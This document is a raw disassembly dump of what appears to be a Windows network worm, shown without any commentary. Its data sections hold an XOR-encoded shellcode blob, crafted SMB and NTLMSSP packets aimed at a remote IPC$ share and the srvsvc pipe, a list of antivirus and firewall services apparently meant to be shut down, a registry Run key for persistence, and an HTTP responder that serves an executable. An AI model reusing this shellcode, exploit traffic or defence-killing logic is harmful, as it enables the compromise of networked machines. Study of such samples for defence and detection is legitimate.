sub_43F885 proc near ; CODE XREF: sub_43E315+4B�p
; sub_43E380+40�p ...
jmp dword ptr ds:loc_40534B+1
sub_43F885 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F891 proc near ; CODE XREF: sub_43E380+16�p
; sub_43F142+1D1�p
jmp dword ptr ds:loc_40534B+5
sub_43F891 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F89D proc near ; CODE XREF: sub_43E380+36�p
jmp dword ptr ds:loc_40534B+9
sub_43F89D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8A9 proc near ; CODE XREF: sub_43E315+41�p
jmp dword ptr ds:loc_405357+1
sub_43F8A9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8B5 proc near ; CODE XREF: sub_43E255+15�p
jmp dword ptr ds:loc_405364
sub_43F8B5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8C1 proc near ; CODE XREF: .data:0043E21B�p
jmp dword ptr ds:sub_405368
sub_43F8C1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8CD proc near ; CODE XREF: .data:0043EE2A�p
; .data:0043EE64�p ...
jmp dword ptr ds:loc_40536B+1
sub_43F8CD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8D9 proc near ; CODE XREF: .data:0043E246�p
jmp dword ptr ds:loc_405370
sub_43F8D9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8E5 proc near ; CODE XREF: sub_43E741+B2�p
; sub_43E741+D0�p ...
jmp dword ptr ds:loc_405374
sub_43F8E5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8F1 proc near ; CODE XREF: sub_43E741+16D�p
; sub_43E741+2E4�p ...
jmp dword ptr ds:loc_405374+4
sub_43F8F1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F8FD proc near ; CODE XREF: .data:0043E19C�p
jmp dword ptr ds:loc_40537C
sub_43F8FD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F909 proc near ; CODE XREF: sub_43E640:loc_43E669�p
; sub_43E640:loc_43E6C3�p ...
jmp dword ptr ds:loc_40537F+1
sub_43F909 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; [00000006 BYTES: COLLAPSED FUNCTION j_aARc. PRESS KEYPAD "+" TO EXPAND]
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F921 proc near ; CODE XREF: .data:0043E45B�p
; sub_43E640+F4�p ...
jmp dword ptr ds:loc_405388
sub_43F921 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F92D proc near ; CODE XREF: .data:0043EDEE�p
jmp dword ptr ds:loc_405388+4
sub_43F92D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F939 proc near ; CODE XREF: sub_43E255+6B�p
; sub_43E255+8E�p ...
jmp dword ptr ds:loc_40538F+1
sub_43F939 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F945 proc near ; CODE XREF: sub_43F619+17�p
jmp dword ptr ds:loc_405391+3
sub_43F945 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F951 proc near ; CODE XREF: .data:0043E40C�p
; .data:0043E428�p
jmp dword ptr ds:loc_405398
sub_43F951 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 17h dup(0)
dd 40300000h, 40311000h, 800000h, 22h dup(0)
dd 5000h, 0
dd 34303400h, 746F4E20h, 756F6620h, 2900646Eh, 0D960413Ah
dd 170A0705h, 27251F1Bh, 2AC9C5ACh, 0DF7F5F3Ch, 746845EBh
dd 2F3A7074h, 3732312Fh, 2 dup(3030302Eh), 3130302Eh, 3030303Ah
dd 662F3038h, 0AEAE6273h, 335DAE62h, 0A0B966C9h, 5758D01h
dd 68AFE8Bh, 575993Ch, 2C068A46h, 99344630h, 0E2470788h
dd 0E80AEBEDh, 0FFFFFFDAh, 99999999h, 41E41499h, 0C9994671h
dd 0C999C999h, 712FE414h, 99C9994Eh, 0F3C999C9h, 0C999F19Dh
dd 99C99989h, 0C999F1C9h, 999CC999h, 0C999F3C9h, 99988B71h
dd 67C999C9h, 10F0E3F3h, 9998931Ch, 0F3C999C9h, 414C999h
dd 0C999989Bh, 71CAC999h, 99C99963h, 0BC999C9h, 10A7C196h
dd 0C999671Ch, 0C999C999h, 9666611Ah, 0C999091Dh, 0C999C999h
dd 0C8C850B2h, 1498F3C8h, 71C941DCh, 99C99936h, 4EC999C9h
dd 1291C0A4h, 0ED599249h, 0C959B2EFh, 14C9C9C9h, 0CBCA2FC4h
dd 0C9990C71h, 0C999C999h, 21E424FFh, 0C7ED5992h, 99F1CDCDh
dd 9CC999C9h, 2C66C999h, 0C9999893h, 71C9C999h, 99C999E3h
dd 0FBC999C9h, 6683B8B0h, 9998932Ch, 66C999C9h, 0C999672Ch
dd 0C999C999h, 0C9991471h, 0C999C999h, 0E7C29C9Bh, 99672C66h
dd 99C999C9h, 99E771C9h, 99C999C9h, 31F1AC9h, 149CF3A4h
dd 99989B04h, 0CAC999C9h, 0C999F571h, 0C999C999h, 7126F434h
dd 71C998F3h, 99C999F9h, 77C999C9h, 14865973h, 496624D4h
dd 0C999CB71h, 0C999C999h, 0EF133BF9h, 0A13729F9h, 0DE9AED9Eh
dd 9E5F6072h, 5AF8C999h, 0C999A9C1h, 2 dup(0C999C999h)
dd 0B7FBEAFFh, 99FCE1FCh, 4 dup(99C999C9h), 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998971Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FDC65A91h, 0C6EAFAh
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 53FFA400h, 73424Dh, 18000000h, 0C807h, 3 dup(0)
dd 0FEFFh, 0FF0C0010h, 400A400h, 0A11h, 0
dd 2000h, 0D4000000h, 69800000h, 4C544E00h, 5053534Dh
dd 100h, 8829700h, 0E0h, 3 dup(0)
dd 570000h, 6E0069h, 6F0064h, 730077h, 320020h, 300030h
dd 200030h, 310032h, 350039h, 570000h, 6E0069h, 6F0064h
dd 730077h, 320020h, 300030h, 200030h, 2E0035h, 30h, 0
dd 0FFDA0000h, 73424D53h, 0
dd 0C80718h, 3 dup(0)
dd 0FEFF00h, 0C002008h, 0DA00FFh, 0A1104h, 0
dd 570000h, 0
dd 800000D4h, 544E009Fh, 53534D4Ch, 30050h, 10000h, 460001h
dd 0
dd 470000h, 0
dd 400000h, 0
dd 400000h, 60000h, 400006h, 100000h, 470010h, 8A150000h
dd 48E088h, 44004Fh, 6A198100h, 49E4F27Ah, 30AF281Ch, 67107425h
dd 69005753h, 64006E00h, 77006F00h, 20007300h, 30003200h
dd 30003000h, 32002000h, 39003100h, 3500h, 69005700h, 64006E00h
dd 77006F00h, 20007300h, 30003200h, 30003000h, 35002000h
dd 30002E00h, 2 dup(0)
dd 53FF5C00h, 75424Dh, 18000000h, 0C807h, 3 dup(0)
dd 800FEFFh, 0FF040030h, 8005C00h, 31000100h, 5C0000h
dd 31005Ch, 320039h, 31002Eh, 380036h, 31002Eh, 32002Eh
dd 300031h, 49005Ch, 430050h, 24h, 3F3F3F3Fh, 3Fh, 0FF640000h
dd 0A2424D53h, 0
dd 0C80718h, 3 dup(0)
dd 4DC08h, 18004008h, 0DEDE00FFh, 16000E00h, 0
dd 9F000000h, 201h, 2 dup(0)
dd 3000000h, 1000000h, 40000000h, 2000000h, 3000000h, 5C000011h
dd 73006C00h, 72006100h, 63007000h, 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0C000000h
dd 4D53FFF4h, 2542h, 7180000h, 0C8h, 2 dup(0)
dd 0DC080000h, 60080004h, 1000h, 0CA0h, 400h, 2 dup(0)
dd 540000h, 540CA0h, 260002h, 0CB14000h, 50005C10h, 50004900h
dd 5C004500h, 0
dd 500h, 1003h, 0CA000h, 100h, 0C8800h, 9000000h, 3EC00h
dd 0
dd 3EC00h, 14950000h, 30040h, 707C0000h, 10040h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 85780000h, 5BAB0013h, 0E9A6h, 0FFF81000h, 2F424D53h
dd 0
dd 0C80718h, 3 dup(0)
dd 0FEFF08h, 0E006008h, 0DEDE00FFh, 4000h, 0FFFF0000h
dd 8FFFFh, 10B8h, 4010B8h, 0
dd 5EE10B9h, 10010000h, 0B8000000h, 1000010h, 0C000000h
dd 20h, 0AD000900h, 0Dh, 0AD000000h, 0Dh, 0D80F0000h, 424D53FFh
dd 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 10h dup(0)
dd 460000h, 101h, 0Dh dup(0)
dd 15123C00h, 275h, 0Dh dup(0)
dd 1C123C00h, 75h, 0Eh dup(0)
dd 0EC816600h, 0E4FF071Ch, 100h, 404CF700h, 404CE900h
dd 200h, 180h, 404CF700h, 404CE000h, 100h, 180h, 404CF700h
dd 404CCF00h, 200h, 80h, 0
dd 404CB500h, 0
dd 404C9C00h, 2 dup(0)
dd 404C8C00h, 2 dup(0)
dd 404C8200h, 2 dup(0)
dd 404C6900h, 2 dup(0)
dd 404C5000h, 2 dup(0)
dd 404C4300h, 2 dup(0)
dd 404C3300h, 100h, 0
dd 404C2C00h, 100h, 4049F800h, 404C2400h, 100h, 0
dd 404C1900h, 2 dup(0)
dd 404C1200h, 100h, 0
dd 404C0C00h, 100h, 0
dd 404C0300h, 100h, 0
dd 404BFC00h, 100h, 0
dd 404BF300h, 100h, 0
dd 404BEC00h, 100h, 0
dd 404BE500h, 100h, 0
dd 404BDD00h, 100h, 0
dd 404BD700h, 100h, 404A0800h, 404BD000h, 100h, 0
dd 404BC800h, 100h, 0
dd 404BC100h, 100h, 0
dd 404BBB00h, 100h, 0
dd 404BB200h, 100h, 404A1800h, 404BAD00h, 100h, 0
dd 404BA800h, 100h, 404A2800h, 404BA200h, 100h, 0
dd 524F5700h, 6669004Dh, 6F530063h, 61777466h, 4D5C6572h
dd 6F726369h, 74666F73h, 6E69575Ch, 73776F64h, 6B005C00h
dd 6469706Ch, 706C6B00h, 6C6B0066h, 76006669h, 74616473h
dd 746E61h, 6F6D7376h, 6D6B006Eh, 78627378h, 786D6B00h
dd 7369646Eh, 786D6B00h, 736469h, 66786D6Bh, 6D6B0077h
dd 6C696678h, 6D6B0065h, 67666378h, 786D6B00h, 676962h
dd 61786D6Bh, 746E6567h, 786D5500h, 676643h, 41786D55h
dd 746E6567h, 786D5500h, 5500554Ch, 6F50786Dh, 6D53006Ch
dd 72655363h, 65636976h, 69667300h, 7265746Ch, 736E6C00h
dd 317766h, 7074754Fh, 4674736Fh, 77657269h, 6C6C61h, 72616873h
dd 63616465h, 73736563h, 41634D00h, 20656566h, 6D617246h
dd 726F7765h, 6553206Bh, 63697672h, 65440065h, 74636574h
dd 6420726Fh, 664F2065h, 65636966h, 6E616353h, 5A00544Eh
dd 41656E6Fh, 6D72616Ch, 6E615000h, 41206164h, 7669746Eh
dd 73757269h, 726F4E00h, 206E6F74h, 69746E41h, 75726976h
dd 65532073h, 63697672h, 614B0065h, 72657073h, 20796B73h
dd 69746E41h, 6361482Dh, 2E72656Bh, 6B6E6Ch, 656E6F5Ah
dd 62614C20h, 6C432073h, 746E6569h, 6F4D4100h, 6F74696Eh
dd 6F4C0072h, 27206B6Fh, 5320276Eh, 706F74h, 54464F53h
dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h
dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh
dd 78006Eh, 253A7325h, 31002F75h, 312E3239h, 252E3836h
dd 75252E75h, 32373100h, 2E75252Eh, 252E7525h, 30310075h
dd 2E75252Eh, 252E7525h, 6EB0075h, 5C0006EBh, 5C73255Ch
dd 24637069h, 2E752500h, 252E7525h, 75252E75h, 54544800h
dd 2E312F50h, 30322031h, 4B4F2030h, 0A0D0A0Dh, 43000A0Dh
dd 65746E6Fh, 4C2D746Eh, 74676E65h, 25203A68h, 0D0A0D75h
dd 5448000Ah, 312F5054h, 3220312Eh, 4F203030h, 430A0D4Bh
dd 65746E6Fh, 542D746Eh, 3A657079h, 70706120h, 6163696Ch
dd 6E6F6974h, 652D782Fh, 632D6578h, 72706D6Fh, 65737365h
dd 0A0D64h, 787878h, 544547h, 300050h, 6 dup(0)
dd 50F400h, 2 dup(0)
dd 57F400h, 524C00h, 513800h, 2 dup(0)
dd 583C00h, 529000h, 514400h, 2 dup(0)
dd 584C00h, 529C00h, 515000h, 2 dup(0)
dd 585C00h, 52A800h, 51AC00h, 2 dup(0)
dd 58C000h, 530400h, 51D800h, 2 dup(0)
dd 58F000h, 533000h, 520C00h, 2 dup(0)
dd 592C00h, 536400h, 1Ah dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 2 dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 0
dd 57003000h, 74534153h, 75747261h, 70h, 61003500h, 70656363h
dd 74h, 62003600h, 646E69h, 63003700h, 65736F6Ch, 6B636F73h
dd 7465h, 63003800h, 656E6E6Fh, 7463h, 67003B00h, 6F687465h
dd 79627473h, 656D616Eh, 67003C00h, 6F687465h, 616E7473h
dd 656Dh, 68004600h, 736E6F74h, 69004700h, 5F74656Eh, 72646461h
dd 69004900h, 5F74656Eh, 616F746Eh, 6C004B00h, 65747369h
dd 6Eh, 72004F00h, 766365h, 73005500h, 646E65h, 73005900h
dd 64747568h, 6E776Fh, 73005A00h, 656B636Fh, 74h, 49008100h
dd 7265746Eh, 4774656Eh, 6F437465h, 63656E6Eh, 53646574h
dd 65746174h, 53004F00h, 74654748h, 63657053h, 466C6169h
dd 65646C6Fh, 74615072h, 4168h, 45008200h, 54746978h, 61657268h
dd 64h, 4700CA00h, 6F437465h, 6E616D6Dh, 6E694C64h, 4165h
dd 4700DE00h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 6449h, 4700F800h, 69467465h, 6953656Ch, 657Ah, 47010C00h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 43001B00h
dd 65736F6Ch, 646E6148h, 656Ch, 47015500h, 69547465h, 6F436B63h
dd 746E75h, 47015C00h, 65567465h, 6F697372h, 6Eh, 47016800h
dd 61626F6Ch, 6464416Ch, 6D6F7441h, 41h, 49019200h, 7265746Eh
dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 49019400h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 4C01AD00h
dd 6C61636Fh, 6F6C6C41h, 63h, 43003100h, 74616572h, 6C694665h
dd 4165h, 5201FA00h, 46646165h, 656C69h, 52020E00h, 6E556C74h
dd 646E6977h, 52020F00h, 655A6C74h, 654D6F72h, 79726F6Dh
dd 53026400h, 7065656Ch, 6C02C600h, 63727473h, 416E7970h
dd 6C02C900h, 6C727473h, 416E65h, 43004700h, 74616572h
dd 72685465h, 646165h, 44005400h, 74656C65h, 6C694665h
dd 4165h, 5300FE00h, 69547465h, 72656Dh, 52000200h, 73696765h
dd 43726574h, 7373616Ch, 41h, 47002000h, 654D7465h, 67617373h
dd 4165h, 54002400h, 736E6172h, 6574616Ch, 7373654Dh, 656761h
dd 44002500h, 61707369h, 4D686374h, 61737365h, 416567h
dd 50003D00h, 5174736Fh, 4D746975h, 61737365h, 6567h, 43004F00h
dd 74616572h, 6E695765h, 45776F64h, 4178h, 44005100h, 72747365h
dd 6957796Fh, 776F646Eh, 44005B00h, 69576665h, 776F646Eh
dd 636F7250h, 41h, 4300BF00h, 65736F6Ch, 76726553h, 48656369h
dd 6C646E61h, 65h, 4300C000h, 72746E6Fh, 65536C6Fh, 63697672h
dd 65h, 4400C300h, 74656C65h, 72655365h, 65636976h, 4F00D100h
dd 536E6570h, 6E614D43h, 72656761h, 41h, 4F00D300h, 536E6570h
dd 69767265h, 416563h, 52016700h, 65446765h, 6574656Ch
dd 756C6156h, 4165h, 52017100h, 72436765h, 65746165h, 4579654Bh
dd 4178h, 52017400h, 6C436765h, 4B65736Fh, 7965h, 52017900h
dd 704F6765h, 654B6E65h, 41784579h, 52018400h, 75516765h
dd 56797265h, 65756C61h, 417845h, 52019000h, 65536765h
dd 6C615674h, 78456575h, 41h, 5F00E800h, 616F7469h, 5F001800h
dd 7465475Fh, 6E69614Dh, 73677241h, 5F018100h, 65656C73h
dd 70h, 65020A00h, 746978h, 6D025400h, 70636D65h, 79h
dd 6D025600h, 65736D65h, 74h, 72026000h, 65736961h, 72026100h
dd 646E61h, 73026A00h, 616E6769h, 6Ch, 73026D00h, 6E697270h
dd 6674h, 73026F00h, 646E6172h, 73027100h, 61637274h, 74h
dd 73027200h, 68637274h, 72h, 73028000h, 74737274h, 72h
dd 6F737700h, 32336B63h, 6C6C642Eh, 0Fh dup(40500000h)
dd 4E495700h, 54454E49h, 4C4C442Eh, 40501400h, 45485300h
dd 32334C4Ch, 4C4C442Eh, 40502800h, 52454B00h, 334C454Eh
dd 4C442E32h, 4Ch, 15h dup(40503C00h), 45535500h, 2E323352h
dd 4C4C44h, 9 dup(40505000h), 56444100h, 33495041h, 4C442E32h
dd 4Ch, 0Bh dup(40506400h), 54524300h, 2E4C4C44h, 4C4C44h
dd 0Eh dup(40507800h), 25h dup(0)
dd 2000h, 0
dd 2000h, 100000h, 2A0000h, 300000h, 480000h
db 2 dup(0)
word_4411DA dw 7C40h ; DATA XREF: sub_403AC7+41�o
db 0
aG8c5 db 'G8C: 5',0 ; DATA XREF: sub_403BAD+20�o
aBpUp db 'BP~up',0 ; DATA XREF: sub_403BAD+5E�o
aZs db 'zS',0 ; DATA XREF: sub_403BAD+128�o
byte_4411ED db 5Eh, 68h, 56h ; DATA XREF: sub_403BAD+14E�o
dd 7F734220h
db 0
aJSovv db 'j# so‚V',0 ; DATA XREF: sub_403BAD+17A�o
byte_4411FD db 0 ; DATA XREF: sub_403D6F+20�o
byte_4411FE db 0 ; DATA XREF: sub_403D6F+31�o
aXf7 db ';xF:7=',0 ; DATA XREF: sub_403D6F+139�o
aXvQu db 'x‚-QU',0 ; DATA XREF: sub_403D6F+15B�o
byte_44120C db 0 ; DATA XREF: sub_403D6F+16F�o
aJdh1c db ' Jdh1c',0 ; DATA XREF: sub_404156+26�o
word_441214 dw 4Eh ; DATA XREF: sub_404156+83�r
align 4
dd 8, 0Ah
dword_441220 dd 8Ah ; sub_404201:loc_404228�r ...
byte_441224 db 70h, 34h, 0 ; DATA XREF: sub_4042A4+16�o
dword_441227 dd 552156h byte_44122B db 79h ; DATA XREF: sub_4042A4+7F�o
db 20h, 0
word_44122E dw 0 ; DATA XREF: sub_4042A4+1DB�o
dd 5, 12h
dword_441238 dd 0 ; .text:loc_4045A4�r ...
dword_44123C dd 0 ; sub_404602+4A�r ...
dword_441240 dd 0 dd 3, 0Fh
dword_44124C dd 0 ; sub_40470D:loc_4046FF�r ...
aAKS db 'A k &s',0 ; DATA XREF: sub_404770+26�o
aMusr db ' musR',0 ; DATA XREF: sub_40479E+6�o
byte_44125E db 0 ; DATA XREF: sub_40479E+30�o
byte_44125F db 0 ; DATA XREF: sub_40479E+200�o
dword_441260 dd 83266Bh byte_441264 db 0 ; DATA XREF: sub_404A6B+33�o
aHSl?2 db 'h&sL?2*',0 ; DATA XREF: sub_404A6B+5A�o
word_44126D dw 78h ; DATA XREF: sub_404D49+74�r
aUwV db 'uW V',0 ; DATA XREF: sub_404DE3+DC�o
dd 3
dword_441278 dd 0Fh ; sub_405217:loc_40527C�r
dword_44127C dd 0 ; sub_404FE7:loc_40500E�r ...
aAKS_0 db 'A k &s',0 ; DATA XREF: sub_40507F+11�o
dword_441288 dd 73756Dh dword_44128C dd 2 ; sub_4063A9+315�r
dword_441290 dd 0Ah ; sub_4056EE+131�r ...
dword_441294 dd 0 ; sub_4052CE:loc_4052FB�r ...
dword_441298 dd 0 byte_44129C db 0 ; DATA XREF: sub_405368:loc_405374�o
aARc db 'a`rc',0 ; DATA XREF: sub_405368+1A�o
byte_4412A2 db 0 ; DATA XREF: sub_405368+6C�o
byte_4412A3 db 6Ah ; DATA XREF: sub_405409+1B�o
dd 6864207Fh
db 42h, 43h, 0
byte_4412AB db 0 ; DATA XREF: sub_405409+29�o
byte_4412AC db 0 ; DATA XREF: sub_405409+1B3�o
a8x6d db '8x6d',0 ; DATA XREF: sub_405600+1C�o
aLw db 'Lw%$',0 ; DATA XREF: sub_405600+6F�o
aQ db 'q<',0 ; DATA XREF: sub_4056EE+22�o
aR1 db 'R1|`',0 ; DATA XREF: sub_4056EE+E9�o
word_4412BF dw 3Ch ; DATA XREF: sub_4056EE+F6�r
a_mU2 db '%.m%u2',0 ; DATA XREF: sub_4056EE+16F�o
byte_4412C8 db 0 ; DATA XREF: sub_4056EE+182�o
aMZW db 'M=z>w',0 ; DATA XREF: sub_4056EE+266�o
aRIAb db 'r I^^€b',0 ; DATA XREF: sub_4056EE+279�o
dword_4412D7 dd 367E7Ah aFBe db 'F#=e ',0 ; DATA XREF: sub_4056EE+5F3�o
word_4412E2 dw 7Eh ; DATA XREF: sub_4056EE+6F4�r
aYmkm db ' ymkm&',0 ; DATA XREF: sub_4056EE+707�o
aWG db '%W*ƒ',0 ; DATA XREF: sub_4056EE+7CF�o
word_4412F0 dw 69h ; DATA XREF: sub_4056EE+864�r
aTcurf db 'TcUrf',0 ; DATA XREF: sub_4056EE+94E�o
dword_4412F8 dd 20245Fh aPxpwz db 'pxPwz',0 ; DATA XREF: sub_406081+80�o
word_441302 dw 4Dh ; DATA XREF: sub_406081:loc_406267�r
a4VVx db '4:V<vX',0 ; DATA XREF: sub_406081+1F9�o
byte_44130B db 0 ; DATA XREF: sub_406081+275�o
dword_44130C dd 56303Ch dword_441310 dd 656943h aGf db '+GF ',0 ; DATA XREF: sub_4063A9+20�o
aHv1xj db 'hV1xJ',0 ; DATA XREF: sub_4063A9+43�o
a6djg db '6DJg',0 ; DATA XREF: sub_4063A9+1EF�o
asc_441324 db '&X',0 ; DATA XREF: sub_4063A9+39A�o
word_441327 dw 20h ; DATA XREF: sub_4063A9+3DE�r
align 4
dd 2
dword_441330 dd 10h dword_441334 dd 0 ; sub_4068DC:loc_40690A�r ...
dword_441338 dd 0 ; sub_406B40+36�r ...
dword_44133C dd 0 ; sub_4069C8+1A�r ...
dword_441340 dd 0FFFFh ; sub_406B40+132�r ...
aK3s db 'k-#3S ',0 ; DATA XREF: sub_406966+C�o
aOdvgM db 'ODvG-M',0 ; DATA XREF: sub_406966+26�o
aESk db 'E`Sk ',0 ; DATA XREF: sub_4069C8+69�o
asc_441358 db ' + ',27h,'<',0 ; DATA XREF: sub_406A44+20�o
aVifa db 'ViFA',0 ; DATA XREF: sub_406A44+80�o
dword_441363 dd 792321h aMVaj db 'M ‚€J',0 ; DATA XREF: sub_406B40+185�o
align 10h
dword_441370 dd 4 ; sub_407F91+48�r
dword_441374 dd 0Bh ; sub_406E3F+F78�r
dword_441378 dd 0 ; sub_406DB4:loc_406DE1�r ...
dword_44137C dd 1 ; sub_408043+1A�o
byte_441380 db 0 ; DATA XREF: sub_406E3F+100D�r
align 2
dw 2Dh
dd 734125h
word_441388 dw 7Eh ; DATA XREF: sub_406E3F+AB�r
dword_44138A dd 496923h aTnaJ4 db 'TNa=J:4',0 ; DATA XREF: sub_406E3F+E6�o
word_441396 dw 3Eh ; DATA XREF: sub_406E3F+13B�r
aIho db 'iHO$|',0 ; DATA XREF: sub_406E3F+1E3�o
aEOsj db 'E osJ',0 ; DATA XREF: sub_406E3F+1F7�o
byte_4413A4 db 0 ; DATA XREF: sub_406E3F+269�o
a0sfvu db ' 0SFvu ',0 ; DATA XREF: sub_406E3F+434�o
dword_4413AD dd 543A4Ah aRO0p db 'r= O0P',0 ; DATA XREF: sub_406E3F+513�o
a_Leiv db '.;^LeIV',0 ; DATA XREF: sub_406E3F+52E�o
aIara db ' $iArA',0 ; DATA XREF: sub_406E3F+53C�o
dword_4413C7 dd 804726h dword_4413CB dd 4B7F20h a?Hg db '`?^HG',0 ; DATA XREF: sub_406E3F+803�o
word_4413D5 dw 6Eh ; DATA XREF: sub_406E3F+85C�r
aJA db 'j €+ ',0 ; DATA XREF: sub_406E3F+A71�o
aIs db '`IS~',0 ; DATA XREF: sub_406E3F+A8C�o
byte_4413E3 db 0 ; DATA XREF: sub_406E3F+ABD�o
byte_4413E4 db 0 ; DATA XREF: sub_406E3F+B93�o
aY3 db '& y$`3',0 ; DATA XREF: sub_406E3F+BFB�o
aMNkY db 'M#nk y',0 ; DATA XREF: sub_406E3F+C72�o
word_4413F3 dw 6Eh ; DATA XREF: sub_406E3F+D07�r
